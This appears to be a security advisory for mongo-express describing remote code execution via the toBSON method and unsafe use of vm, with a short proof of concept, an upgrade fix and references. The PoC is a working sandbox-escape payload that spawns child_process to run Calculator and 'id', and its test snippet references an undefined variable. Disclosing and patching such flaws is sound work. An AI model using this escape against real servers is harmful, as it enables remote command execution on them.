## Overview
[mongo-express](https://github.com/mongo-express/mongo-express#readme) is a web-based MongoDB admin interface written with Node.js, Express and Bootstrap3
Affected versions of this package are vulnerable to Remote Code Execution (RCE) via endpoints that uses the `toBSON` method. A misuse of the `vm` dependency to perform `exec` commands in a non-safe environment.
## PoC by Jonathan Leitschuh
```
# MacOS
this.constructor.constructor("return process")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator')
it('should not be executable', function () {
const test = `
this.constructor.constructor("return console")().log(this.constructor.constructor("return process")().mainModule.require('child_process').execSync('id').toString())
`;
const result = bson.toBSON(calculatorTest);
});
```
## Remediation
Upgrade `mongo-express` to version 0.54.0 or higher.
## References
- [GitHub PR](https://github.com/mongo-express/mongo-express/pull/522)
- [GitHub Security Advisory](https://github.com/mongo-express/mongo-express/security/advisories/GHSA-h47j-hc6x-h3qq)
暂无评论